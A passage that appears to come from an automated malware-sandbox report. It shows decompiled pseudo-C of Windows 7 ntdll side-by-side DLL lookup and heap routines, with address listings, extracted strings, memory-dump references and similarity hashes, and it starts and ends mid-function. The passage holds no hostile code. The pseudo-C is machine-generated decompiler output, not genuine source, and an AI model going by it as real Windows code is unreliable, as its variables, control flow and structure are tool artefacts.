													E00958980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
													_t242 = _v44;
													 *_t347 =  *_t347 + _t242;
													_t347[1] =  *_t347 + _t242 + 2;
													_t341 = 0;
													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
													goto L43;
												}
												__eflags = _t237 - _t347[8];
												if(_t237 <= _t347[8]) {
													goto L84;
												}
												goto L83;
											}
											L43:
											_t245 = _v88;
											__eflags = _t245;
											if(_t245 != 0) {
												 *_t245 =  *_t245 | 0x00000002;
											}
											goto L44;
										}
										__eflags = _t232 & 0x00000008;
										if((_t232 & 0x00000008) != 0) {
											_t283 = E0094FBD7(1,  &_v68, 0x97b024,  &_v56);
											__eflags = _t283;
											if(_t283 >= 0) {
												_v68 = _v68 + 0xfffe - _v56;
												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
												goto L37;
											}
											__eflags = _t283 - 0xc0000225;
											if(_t283 != 0xc0000225) {
												goto L2;
											}
											_push("Status != STATUS_NOT_FOUND");
											_push(0x472);
											L74:
											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
											_push("Internal error check failed");
											E009D77A7(_t303, _t341);
											_t283 = 0xc00000e5;
											goto L2;
										}
										L37:
										_t254 = _v68 & 0x0000ffff;
										 *_t345 =  *_t345 + _t254;
										__eflags =  *_t345 - 0xffff;
										if( *_t345 >= 0xffff) {
											goto L76;
										}
										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
										__eflags = _t255 - 0xfffe;
										if(_t255 > 0xfffe) {
											goto L76;
										}
										_t287 =  &(_t347[4]);
										__eflags = _t287;
										if(_t287 == 0) {
											L77:
											_t256 = E009778E5(0, _t287, _t255);
											__eflags = _t256;
											if(_t256 >= 0) {
												L41:
												_t347[2] =  *_t287;
												E00958980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
												_t260 = _v68;
												 *_t347 =  *_t347 + _t260;
												_t347[1] =  *_t347 + _t260 + 2;
												_t350 = _t350 + 0xc;
												_t341 = 0;
												__eflags = 0;
												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
												goto L42;
											}
											goto L61;
										}
										__eflags = _t255 - _t347[8];
										if(_t255 > _t347[8]) {
											goto L77;
										}
										goto L41;
									}
									 *_t347 = 0;
									_t266 = ( *_t303 & 0x0000ffff) + 2;
									__eflags = _t266 - 0xfffe;
									if(_t266 > 0xfffe) {
										goto L76;
									}
									__eflags = _t345;
									if(_t345 == 0) {
										L63:
										_t267 = E009778E5(0, _t345, _t266);
										__eflags = _t267;
										if(_t267 < 0) {
											goto L61;
										}
										_t303 = _v60;
										L33:
										_t347[2] =  *_t345;
										E00958980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
										_t271 = _v60;
										_t350 = _t350 + 0xc;
										_t347[1] =  *_t347 +  *_t271 + 2;
										 *_t347 =  *_t347 +  *_t271;
										_t303 = _t347[2];
										_t341 = 0;
										__eflags = 0;
										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
										goto L34;
									}
									__eflags = _t266 - _t347[8];
									if(_t266 > _t347[8]) {
										goto L63;
									}
									goto L33;
								}
								L61:
								_t283 = 0xc0000017;
								goto L2;
							}
							__eflags = _t214 - _t347[8];
							if(_t214 > _t347[8]) {
								goto L60;
							}
							goto L29;
						}
					}
					_t303 = 0;
					_v48 = 0;
					__eflags = _t207 & 0x00000004;
					if((_t207 & 0x00000004) != 0) {
						_push("sxsisol_SearchActCtxForDllName");
						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
						E00993F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
						goto L48;
					}
					__eflags = _v116 & 0x00000001;
					if((_v116 & 0x00000001) != 0) {
						__eflags = _v116 & 0x00000002;
						if((_v116 & 0x00000002) != 0) {
							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
							_push(0x416);
							goto L74;
						}
						_t303 = 1;
					}
					__eflags = _v116 & 0x00000002;
					if((_v116 & 0x00000002) != 0) {
						_t303 = _t303 | 0x00000002;
					}
					_t283 = E0096C507(_t303, _v124, _v120,  &_v60, E0096CDAD,  &_v48);
					__eflags = _t283;
					if(_t283 < 0) {
						__eflags = _t283 - 0xc0000120;
						if(_t283 == 0xc0000120) {
							__eflags = _v48;
							if(_v48 < 0) {
								_t283 = _v48;
							}
						}
						goto L2;
					} else {
						goto L22;
					}
				}
				if(_t283 == 0xc0150001) {
					_t283 = _t283 + 7;
				}
				goto L2;
			}















































































                                                                                                                                                              0x0094f3cf
                                                                                                                                                              0x0094f3da
                                                                                                                                                              0x0094f3e1
                                                                                                                                                              0x0094f3eb
                                                                                                                                                              0x0094f3f4
                                                                                                                                                              0x0094f3f9
                                                                                                                                                              0x0094f3fb
                                                                                                                                                              0x0094f3fe
                                                                                                                                                              0x0094f408
                                                                                                                                                              0x0094f40f
                                                                                                                                                              0x0094f412
                                                                                                                                                              0x0094f41a
                                                                                                                                                              0x0094f41d
                                                                                                                                                              0x0094f420
                                                                                                                                                              0x0094f423
                                                                                                                                                              0x0094f42b
                                                                                                                                                              0x0094f42e
                                                                                                                                                              0x0094f42f
                                                                                                                                                              0x0094f433
                                                                                                                                                              0x0094f439
                                                                                                                                                              0x0094f444
                                                                                                                                                              0x0094f44e
                                                                                                                                                              0x0094f451
                                                                                                                                                              0x0094f454
                                                                                                                                                              0x0094f457
                                                                                                                                                              0x0094f45f
                                                                                                                                                              0x0094f463
                                                                                                                                                              0x0096c2bb
                                                                                                                                                              0x0096c2bf
                                                                                                                                                              0x0096c4fb
                                                                                                                                                              0x0096c4fb
                                                                                                                                                              0x0094f475
                                                                                                                                                              0x0094f475
                                                                                                                                                              0x0094f478
                                                                                                                                                              0x0094f47d
                                                                                                                                                              0x0094f481
                                                                                                                                                              0x009a3bf8
                                                                                                                                                              0x009a3bfb
                                                                                                                                                              0x009a3c00
                                                                                                                                                              0x009a3c00
                                                                                                                                                              0x0094f48a
                                                                                                                                                              0x0094f48d
                                                                                                                                                              0x0094f48d
                                                                                                                                                              0x0094f490
                                                                                                                                                              0x0094f495
                                                                                                                                                              0x0094f499
                                                                                                                                                              0x0094f499
                                                                                                                                                              0x0094f4a2
                                                                                                                                                              0x0094f4a6
                                                                                                                                                              0x0094f4aa
                                                                                                                                                              0x0094f4ae
                                                                                                                                                              0x0095e238
                                                                                                                                                              0x0095e238
                                                                                                                                                              0x0094f4c3
                                                                                                                                                              0x0094f4c3
                                                                                                                                                              0x0096c2c5
                                                                                                                                                              0x0096c2cf
                                                                                                                                                              0x0096c2d2
                                                                                                                                                              0x00984327
                                                                                                                                                              0x00984327
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00984327
                                                                                                                                                              0x0096c2d8
                                                                                                                                                              0x0096c2df
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c2e5
                                                                                                                                                              0x0096c2eb
                                                                                                                                                              0x0096c2ee
                                                                                                                                                              0x0096c2f1
                                                                                                                                                              0x0096c2f3
                                                                                                                                                              0x0096c2f6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c2fc
                                                                                                                                                              0x0096c2ff
                                                                                                                                                              0x0096c302
                                                                                                                                                              0x0096c304
                                                                                                                                                              0x0096c30a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c310
                                                                                                                                                              0x0096c318
                                                                                                                                                              0x0096c31a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c320
                                                                                                                                                              0x0096c322
                                                                                                                                                              0x0096c325
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c32b
                                                                                                                                                              0x0096c32e
                                                                                                                                                              0x0096c331
                                                                                                                                                              0x0096c333
                                                                                                                                                              0x0096c335
                                                                                                                                                              0x0096c37b
                                                                                                                                                              0x0096c383
                                                                                                                                                              0x0096c386
                                                                                                                                                              0x0096c388
                                                                                                                                                              0x0096c38a
                                                                                                                                                              0x0096c38c
                                                                                                                                                              0x0096c38f
                                                                                                                                                              0x0096c391
                                                                                                                                                              0x0096c391
                                                                                                                                                              0x0096c394
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3c35
                                                                                                                                                              0x009a3c39
                                                                                                                                                              0x009a3c3b
                                                                                                                                                              0x009a3c3e
                                                                                                                                                              0x009a3c41
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3c4a
                                                                                                                                                              0x009a3c4d
                                                                                                                                                              0x009a3c4f
                                                                                                                                                              0x009a3c51
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3c5c
                                                                                                                                                              0x009a3c5f
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3c68
                                                                                                                                                              0x009a3c6d
                                                                                                                                                              0x009a3c6e
                                                                                                                                                              0x009a3c6e
                                                                                                                                                              0x0096c39a
                                                                                                                                                              0x0096c39d
                                                                                                                                                              0x0096c39f
                                                                                                                                                              0x0096c3a4
                                                                                                                                                              0x0096c3a4
                                                                                                                                                              0x0096c3a4
                                                                                                                                                              0x0096c3a9
                                                                                                                                                              0x0096c3ac
                                                                                                                                                              0x0096c3b1
                                                                                                                                                              0x009a3dae
                                                                                                                                                              0x009a3dae
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c3b7
                                                                                                                                                              0x0096c3b7
                                                                                                                                                              0x0096c3ba
                                                                                                                                                              0x0096c3bc
                                                                                                                                                              0x009a3c76
                                                                                                                                                              0x009a3c7a
                                                                                                                                                              0x009a3c7f
                                                                                                                                                              0x009a3c81
                                                                                                                                                              0x009a3c8d
                                                                                                                                                              0x0096c3cb
                                                                                                                                                              0x0096c3cd
                                                                                                                                                              0x0096c3d4
                                                                                                                                                              0x0096c3d8
                                                                                                                                                              0x0096c3da
                                                                                                                                                              0x0096c445
                                                                                                                                                              0x0096c445
                                                                                                                                                              0x0096c449
                                                                                                                                                              0x0096c44d
                                                                                                                                                              0x009a3caa
                                                                                                                                                              0x009a3cad
                                                                                                                                                              0x009a3cb0
                                                                                                                                                              0x009a3cb8
                                                                                                                                                              0x009a3cbe
                                                                                                                                                              0x009a3cc5
                                                                                                                                                              0x009a3cc9
                                                                                                                                                              0x009a3cce
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3cd7
                                                                                                                                                              0x009a3cd9
                                                                                                                                                              0x009a3ce0
                                                                                                                                                              0x009a3ce7
                                                                                                                                                              0x009a3cec
                                                                                                                                                              0x009a3cee
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3cf0
                                                                                                                                                              0x009a3cfd
                                                                                                                                                              0x009a3d05
                                                                                                                                                              0x009a3d0d
                                                                                                                                                              0x009a3d11
                                                                                                                                                              0x009a3d20
                                                                                                                                                              0x009a3d24
                                                                                                                                                              0x009a3d27
                                                                                                                                                              0x009a3d29
                                                                                                                                                              0x009a3d2c
                                                                                                                                                              0x009a3d2f
                                                                                                                                                              0x009a3d36
                                                                                                                                                              0x009a3d39
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3d3f
                                                                                                                                                              0x009a3cdb
                                                                                                                                                              0x009a3cde
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3cde
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3caa
                                                                                                                                                              0x0096c453
                                                                                                                                                              0x0096c456
                                                                                                                                                              0x0096c458
                                                                                                                                                              0x0096c45b
                                                                                                                                                              0x0096c45d
                                                                                                                                                              0x0096c4e4
                                                                                                                                                              0x0096c4e7
                                                                                                                                                              0x0096c4ea
                                                                                                                                                              0x009a3dce
                                                                                                                                                              0x009a3dd3
                                                                                                                                                              0x009a3dda
                                                                                                                                                              0x009a3ddc
                                                                                                                                                              0x009a3dde
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3de6
                                                                                                                                                              0x009a3ded
                                                                                                                                                              0x009a3df0
                                                                                                                                                              0x009a3df5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3df7
                                                                                                                                                              0x009a3dfa
                                                                                                                                                              0x009a3dfc
                                                                                                                                                              0x009a3e03
                                                                                                                                                              0x009a3e07
                                                                                                                                                              0x009a3e0c
                                                                                                                                                              0x009a3e0e
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3e14
                                                                                                                                                              0x009a3e23
                                                                                                                                                              0x009a3e2a
                                                                                                                                                              0x009a3e32
                                                                                                                                                              0x009a3e36
                                                                                                                                                              0x009a3e43
                                                                                                                                                              0x009a3e4f
                                                                                                                                                              0x009a3e51
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3e51
                                                                                                                                                              0x009a3dfe
                                                                                                                                                              0x009a3e01
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3e01
                                                                                                                                                              0x0096c4f0
                                                                                                                                                              0x0096c4f0
                                                                                                                                                              0x0096c4f3
                                                                                                                                                              0x0096c4f5
                                                                                                                                                              0x009a3e5a
                                                                                                                                                              0x009a3e5a
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c4f5
                                                                                                                                                              0x0096c463
                                                                                                                                                              0x0096c465
                                                                                                                                                              0x009a3d58
                                                                                                                                                              0x009a3d5a
                                                                                                                                                              0x009a3d5c
                                                                                                                                                              0x009a3d98
                                                                                                                                                              0x009a3da6
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3da6
                                                                                                                                                              0x009a3d5e
                                                                                                                                                              0x009a3d64
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3d6a
                                                                                                                                                              0x009a3d6f
                                                                                                                                                              0x009a3d74
                                                                                                                                                              0x009a3d74
                                                                                                                                                              0x009a3d79
                                                                                                                                                              0x009a3d7e
                                                                                                                                                              0x009a3d83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3d83
                                                                                                                                                              0x0096c46b
                                                                                                                                                              0x0096c46b
                                                                                                                                                              0x0096c46f
                                                                                                                                                              0x0096c471
                                                                                                                                                              0x0096c477
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c480
                                                                                                                                                              0x0096c484
                                                                                                                                                              0x0096c489
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c48f
                                                                                                                                                              0x0096c492
                                                                                                                                                              0x0096c494
                                                                                                                                                              0x009a3db8
                                                                                                                                                              0x009a3dbc
                                                                                                                                                              0x009a3dc1
                                                                                                                                                              0x009a3dc3
                                                                                                                                                              0x0096c4a3
                                                                                                                                                              0x0096c4b2
                                                                                                                                                              0x0096c4b9
                                                                                                                                                              0x0096c4c1
                                                                                                                                                              0x0096c4c5
                                                                                                                                                              0x0096c4d2
                                                                                                                                                              0x0096c4db
                                                                                                                                                              0x0096c4de
                                                                                                                                                              0x0096c4de
                                                                                                                                                              0x0096c4e0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c4e0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3dc9
                                                                                                                                                              0x0096c49a
                                                                                                                                                              0x0096c49d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c49d
                                                                                                                                                              0x0096c3de
                                                                                                                                                              0x0096c3e4
                                                                                                                                                              0x0096c3e7
                                                                                                                                                              0x0096c3ec
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c3f2
                                                                                                                                                              0x0096c3f4
                                                                                                                                                              0x009a3c95
                                                                                                                                                              0x009a3c99
                                                                                                                                                              0x009a3c9e
                                                                                                                                                              0x009a3ca0
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3ca2
                                                                                                                                                              0x0096c403
                                                                                                                                                              0x0096c405
                                                                                                                                                              0x0096c418
                                                                                                                                                              0x0096c420
                                                                                                                                                              0x0096c426
                                                                                                                                                              0x0096c42d
                                                                                                                                                              0x0096c434
                                                                                                                                                              0x0096c43a
                                                                                                                                                              0x0096c43f
                                                                                                                                                              0x0096c43f
                                                                                                                                                              0x0096c441
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c441
                                                                                                                                                              0x0096c3fa
                                                                                                                                                              0x0096c3fd
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c3fd
                                                                                                                                                              0x009a3c83
                                                                                                                                                              0x009a3c83
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3c83
                                                                                                                                                              0x0096c3c2
                                                                                                                                                              0x0096c3c5
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c3c5
                                                                                                                                                              0x0096c3b1
                                                                                                                                                              0x0096c337
                                                                                                                                                              0x0096c339
                                                                                                                                                              0x0096c33c
                                                                                                                                                              0x0096c33e
                                                                                                                                                              0x009a3bce
                                                                                                                                                              0x009a3bd3
                                                                                                                                                              0x009a3be7
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3bec
                                                                                                                                                              0x0096c344
                                                                                                                                                              0x0096c348
                                                                                                                                                              0x0097c1a5
                                                                                                                                                              0x0097c1a9
                                                                                                                                                              0x009a3c08
                                                                                                                                                              0x009a3c0d
                                                                                                                                                              0x00000000
                                                                                                                                                              0x009a3c0d
                                                                                                                                                              0x0097c1b1
                                                                                                                                                              0x0097c1b1
                                                                                                                                                              0x0096c34e
                                                                                                                                                              0x0096c352
                                                                                                                                                              0x0098431f
                                                                                                                                                              0x0098431f
                                                                                                                                                              0x0096c371
                                                                                                                                                              0x0096c373
                                                                                                                                                              0x0096c375
                                                                                                                                                              0x009a3c17
                                                                                                                                                              0x009a3c1d
                                                                                                                                                              0x009a3c23
                                                                                                                                                              0x009a3c27
                                                                                                                                                              0x009a3c2d
                                                                                                                                                              0x009a3c2d
                                                                                                                                                              0x009a3c27
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x00000000
                                                                                                                                                              0x0096c375
                                                                                                                                                              0x0094f46f
                                                                                                                                                              0x009a3bc0
                                                                                                                                                              0x009a3bc0
                                                                                                                                                              0x00000000

                                                                                                                                                              Strings
                                                                                                                                                              • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 009A3C08
                                                                                                                                                              • @, xrefs: 0094F3FE
                                                                                                                                                              • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 009A3BDF
                                                                                                                                                              • Status != STATUS_NOT_FOUND, xrefs: 009A3D6A
                                                                                                                                                              • sxsisol_SearchActCtxForDllName, xrefs: 009A3BCE
                                                                                                                                                              • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 009A3D74
                                                                                                                                                              • Internal error check failed, xrefs: 009A3D79
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000006.00000002.2203624657.0000000000930000.00000040.00000001.sdmp, Offset: 00920000, based on PE: true
                                                                                                                                                              • Associated: 00000006.00000002.2203612094.0000000000920000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203719368.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203724457.0000000000A20000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203728871.0000000000A24000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203733148.0000000000A27000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203744469.0000000000A30000.00000040.00000001.sdmp Download File
                                                                                                                                                              • Associated: 00000006.00000002.2203809294.0000000000A90000.00000040.00000001.sdmp Download File
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID:
                                                                                                                                                              • String ID: !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)$@$Internal error check failed$Status != STATUS_NOT_FOUND$[%x.%x] SXS: %s - Relative redirection plus env var expansion.$d:\w7rtm\minkernel\ntdll\sxsisol.cpp$sxsisol_SearchActCtxForDllName
                                                                                                                                                              • API String ID: 0-4103935307
                                                                                                                                                              • Opcode ID: 1e8450b4457298799390d23cd95401dc34836e02d75d848f831ce727cfcacf52
                                                                                                                                                              • Instruction ID: dccd6cecfecb63c582bbc093fe63307b95a5fbea2fcfee8f2e6d8baae54129b7
                                                                                                                                                              • Opcode Fuzzy Hash: 1e8450b4457298799390d23cd95401dc34836e02d75d848f831ce727cfcacf52
                                                                                                                                                              • Instruction Fuzzy Hash: E4029170A00219DBDB24CFA9C891ABEB7F5FF49704F20842EF896E7291E7749945CB50
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Function 0096EE4C, Relevance: 8.1, Strings: 6, Instructions: 601COMMONCrypto
                                                                                                                                                              Download Yara Rule
                                                                                                                                                              C-Code - Quality: 61%
                                                                                                                                                              			E0096EE4C(void* __ebx, void* __edi, signed int _a4, unsigned int _a8, signed int _a12, signed int _a16) {
				signed int _v8;
				char _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				intOrPtr _v28;
				char _v32;
				char _v36;
				void* __esi;
				void* __ebp;
				signed int _t258;
				signed char _t259;
				signed int _t261;
				signed int _t271;
				signed int _t274;
				signed int _t275;
				signed int _t276;
				signed int _t278;
				signed char _t279;
				intOrPtr _t281;
				signed int _t293;
				intOrPtr _t300;
				intOrPtr _t301;
				unsigned int _t307;
				signed char _t308;
				signed int _t317;
				unsigned int _t326;
				signed int _t327;
				intOrPtr _t335;
				intOrPtr _t347;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				signed char _t363;
				signed int _t370;
				unsigned int _t380;
				signed int _t381;
				intOrPtr _t389;
				signed int _t401;
				intOrPtr _t403;
				void* _t410;
				signed int _t420;
				signed int _t421;
				unsigned int* _t426;
				signed int _t432;
				signed int _t442;
				intOrPtr _t444;
				signed int _t452;
				signed int _t456;
				intOrPtr _t457;
				void* _t472;
				signed int _t480;
				void* _t483;
				signed int _t484;
				intOrPtr _t486;
				signed short* _t487;
				signed short* _t488;
				unsigned int _t492;
				signed int _t493;

				_t493 = _a4;
				_v12 = 0;
				if(( *(_t493 + 0xd0) ^  *(_t493 + 0x58)) != 0) {
					return E00957353(_t493, _a8, _a12);
				}
				if(_a16 != 0) {
					_t420 = _a8;
					__eflags =  *(_t420 + 2) & 0x00000008;
					if(( *(_t420 + 2) & 0x00000008) != 0) {
						 *((intOrPtr*)(_t493 + 0x120)) =  *((intOrPtr*)(_t493 + 0x120)) - 1;
						_t258 = E009761B3(_t420,  &_v36,  &_v24);
						__eflags = _t258;
						if(_t258 != 0) {
							 *((intOrPtr*)(_t493 + 0x124)) =  *((intOrPtr*)(_t493 + 0x124)) - _v24;
						}
					}
					_a4 = _t420;
					L13:
					_t259 =  *((intOrPtr*)(_t420 + 6));
					__eflags = _t259;
					if(_t259 == 0) {
						_t421 = _t493;
						_v20 = _t493;
					} else {
						_t421 = (_t420 & 0xffff0000) - ((_t259 & 0x000000ff) << 0x10) + 0x10000;
						__eflags = _t421;
						_v20 = _t421;
					}
					_t261 = _a4 + _a12 * 8;
					__eflags =  *((char*)(_t261 + 7)) - 3;
					_v24 = _t261;
					if( *((char*)(_t261 + 7)) == 3) {
						_t483 = _t261 + 8;
						E0095AB77(_t493, _t483);
						_v28 =  *((intOrPtr*)(_t483 + 0x10));
						 *((intOrPtr*)(_t421 + 0x30)) =  *((intOrPtr*)(_t421 + 0x30)) - 1;
						_v16 =  *(_t483 + 0x14);
						 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) - ( *(_t483 + 0x14) >> 0xc);
						 *(_t493 + 0xe0) =  *(_t493 + 0xe0) +  *(_t483 + 0x14);
						 *((intOrPtr*)(_t493 + 0xf0)) =  *((intOrPtr*)(_t493 + 0xf0)) - 1;
						__eflags =  *(_t483 + 0x14) - 0x7f000;
						if( *(_t483 + 0x14) >= 0x7f000) {
							_t102 = _t493 + 0xe4;
							 *_t102 =  *(_t493 + 0xe4) -  *(_t483 + 0x14);
							__eflags =  *_t102;
						}
						_a12 = _a12 + ( *(_t483 + 0x14) >> 3) + 0x20;
						_v12 = 1;
					} else {
						_t32 =  &_v16;
						 *_t32 = _v16 & 0x00000000;
						__eflags =  *_t32;
					}
					_t271 = _a4;
					__eflags =  *(_t271 + 4) ^  *(_t493 + 0x54);
					if(( *(_t271 + 4) ^  *(_t493 + 0x54)) == 0) {
						_t471 = _a4;
						_v8 = _a4;
						_t274 = E00998C11(_t421, _a4);
						__eflags = _a16;
						_t484 = _t274;
						if(_a16 != 0) {
							__eflags = _t484;
							if(_t484 != 0) {
								goto L56;
							}
							goto L18;
						}
						L56:
						__eflags =  *0xa277b0 - 1;
						if( *0xa277b0 >= 1) {
							__eflags = _t484;
							if(_t484 == 0) {
								_t347 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *((intOrPtr*)(_t347 + 0xc)) - _t484;
								if( *((intOrPtr*)(_t347 + 0xc)) == _t484) {
									_push("HEAP: ");
									E0099373B();
								} else {
									E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
								}
								_push("(UCRBlock != NULL)");
								E0099373B();
								E009EF826(_t421, _t471, _t484, _t493, 1);
							}
						}
						__eflags = _v12;
						_t275 = _a12;
						_t432 = _a4;
						if(_v12 != 0) {
							_t276 = _t432 + _t275 * 8;
						} else {
							_t130 = _t275 * 8; // -16
							_t276 = _t432 + _t130 - 0x10;
						}
						_t278 = (_t276 & 0xfffff000) - _v8;
						__eflags = _t278;
						_a8 = _t278;
						if(__eflags == 0) {
							L85:
							__eflags =  *0xa277b0 - 1;
							if( *0xa277b0 >= 1) {
								__eflags = _v12;
								if(_v12 != 0) {
									_t281 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
									__eflags =  *(_t281 + 0xc);
									if( *(_t281 + 0xc) == 0) {
										_push("HEAP: ");
										E0099373B();
									} else {
										E0099373B("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0xc)) + 0xc)) + 0x2c);
									}
									_push("(!TrailingUCR)");
									E0099373B();
									E009EF826(_t421, _t471, _t484, _t493, 1);
								}
							}
							goto L54;
						} else {
							_t293 = E00954167(_t471, __eflags, 0xffffffff,  &_v8,  &_a8, 0x4000);
							__eflags = _t293;
							if(_t293 < 0) {
								L89:
								_t472 = 3;
								E0095444F(_t493, _t472);
								__eflags = _v12;
								if(_v12 != 0) {
									E0095A96B(_t493, _t421, _v28 + 0xffffffe8, _v16, _a4,  &_a12);
								}
								L54:
								_push(_a12);
								_push(_a4);
								L12:
								_push(_t493);
								_t279 = E00957353();
								L7:
								return _t279;
							}
							__eflags =  *0x7ffe0380;
							if( *0x7ffe0380 != 0) {
								_t300 =  *((intOrPtr*)( *[fs:0x18] + 0x30));
								__eflags =  *(_t300 + 0x240) & 0x00000001;
								if(( *(_t300 + 0x240) & 0x00000001) != 0) {
									E009EEFE0(_t493, _v8, _a8, 5);
								}
							}
							 *((intOrPtr*)(_t493 + 0xf8)) =  *((intOrPtr*)(_t493 + 0xf8)) + 1;
							_t301 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t301 - 0x7f000;
							if(_t301 >= 0x7f000) {
								_t139 = _t493 + 0xe4;
								 *_t139 =  *(_t493 + 0xe4) - _t301;
								__eflags =  *_t139;
							}
							E0095AB77(_t493, _t484);
							 *((intOrPtr*)(_t484 + 0x14)) =  *((intOrPtr*)(_t484 + 0x14)) + _a8;
							E0095AA2C(_t493, _t484);
							 *((intOrPtr*)(_t421 + 0x2c)) =  *((intOrPtr*)(_t421 + 0x2c)) + (_a8 >> 0xc);
							_t307 = _a8;
							 *(_t493 + 0xe0) =  *(_t493 + 0xe0) - _t307;
							_t486 =  *((intOrPtr*)(_t484 + 0x14));
							__eflags = _t486 - 0x7f000;
							if(_t486 >= 0x7f000) {
								_t151 = _t493 + 0xe4;
								 *_t151 =  *(_t493 + 0xe4) + _t486;
								__eflags =  *_t151;
							}
							__eflags = _v12;
							if(_v12 != 0) {
								L73:
								_t308 =  *0x7ffe0380;
								__eflags = _t308;
								if(_t308 != 0) {
									__eflags =  *( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x240) & 0x00000001;
									if(__eflags != 0) {
